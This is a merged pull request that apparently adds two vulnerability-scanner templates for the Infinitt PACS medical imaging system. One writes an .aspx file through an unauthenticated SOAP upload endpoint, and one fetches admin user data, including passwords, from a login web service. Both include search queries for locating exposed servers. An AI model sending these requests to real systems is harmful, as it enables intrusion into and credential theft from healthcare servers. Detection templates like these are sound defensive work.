Merge pull request #11314 from adeljck/infinitt-pacs-system

infinitt pacs system vuln
projectdiscovery · Dec 23, 2024 · 26c4551 · 26c4551
2 parents 17fac44 + 4713b7d
commit 26c4551
Show file tree

Hide file tree

Showing 2 changed files with 94 additions and 0 deletions.
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
@@ -0,0 +1,56 @@
+id: infinitt-pacs-file-upload
+
+info:
+  name: Infinitt PACS System - Arbitary File Upload
+  author: adeljck
+  severity: critical
+  description: |
+    Infinitt PACS System is vulnerable to file upload vulnerability which allows an attacker to upload a webshell and gain unauthorized access to the server.
+  remediation: |
+    Ensure that file uploads are properly validated and sanitized. Implement strict access controls and monitoring to detect and prevent unauthorized file uploads.
+  reference:
+    - https://github.com/wy876/POC/blob/a9e4000fc76d0157b53ade916323b7b8256b17c3/%E8%8B%B1%E9%A3%9E%E8%BE%BE%E5%8C%BB%E5%AD%A6%E5%BD%B1%E5%83%8F%E5%AD%98%E6%A1%A3%E4%B8%8E%E9%80%9A%E4%BF%A1%E7%B3%BB%E7%BB%9F/%E8%8B%B1%E9%A3%9E%E8%BE%BE%E5%8C%BB%E5%AD%A6%E5%BD%B1%E5%83%8F%E5%AD%98%E6%A1%A3%E4%B8%8E%E9%80%9A%E4%BF%A1%E7%B3%BB%E7%BB%9FWebJobUpload%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: icon_hash="1474455751" || icon_hash="702238928"
+  tags: infinitt,file-upload,intrusive,rce
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /webservices/WebJobUpload.asmx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml; charset=utf-8
+        Soapaction: "http://rainier/jobUpload"
+
+        <?xml version="1.0" encoding="utf-8"?>
+        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+        <soap:Body>
+        <jobUpload xmlns="http://rainier">
+        <vcode>1</vcode>
+        <subFolder></subFolder>
+        <fileName>{{filename}}.aspx</fileName>
+        <bufValue>MTIz</bufValue>
+        </jobUpload>
+        </soap:Body>
+        </soap:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<jobUploadResult>"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/xml"
+
+      - type: status
+        status:
+          - 200
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
@@ -0,0 +1,38 @@
+id: infinitt-pacs-info-disclosure
+
+info:
+  name: Infinitt PACS System - Information Disclosure
+  author: adeljck
+  severity: high
+  description: |
+    Infinitt PACS System is vulnerable to an Information Disclosure vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
+  remediation: |
+    Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information.
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: icon_hash="1474455751" || icon_hash="702238928"
+  tags: infinitt,disclosure,exposure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<web_user_login>"
+          - "<USER_KEY>"
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "text/xml"
+
+      - type: status
+        status:
+          - 200